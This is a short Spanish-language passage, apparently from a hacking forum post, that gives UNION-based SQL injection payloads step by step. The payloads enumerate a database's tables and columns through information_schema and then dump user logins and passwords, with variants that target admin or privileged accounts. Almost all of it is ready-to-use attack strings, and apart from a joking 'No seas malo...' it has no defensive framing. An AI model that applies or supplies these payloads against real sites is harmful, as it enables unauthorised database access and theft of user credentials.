Sacas todas las tablas, y buscas la de los usuarios:
union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+
A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios:
union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+
Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+
Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este
truco.
Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario.
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+
No seas malo...
Autor
. 
En línea
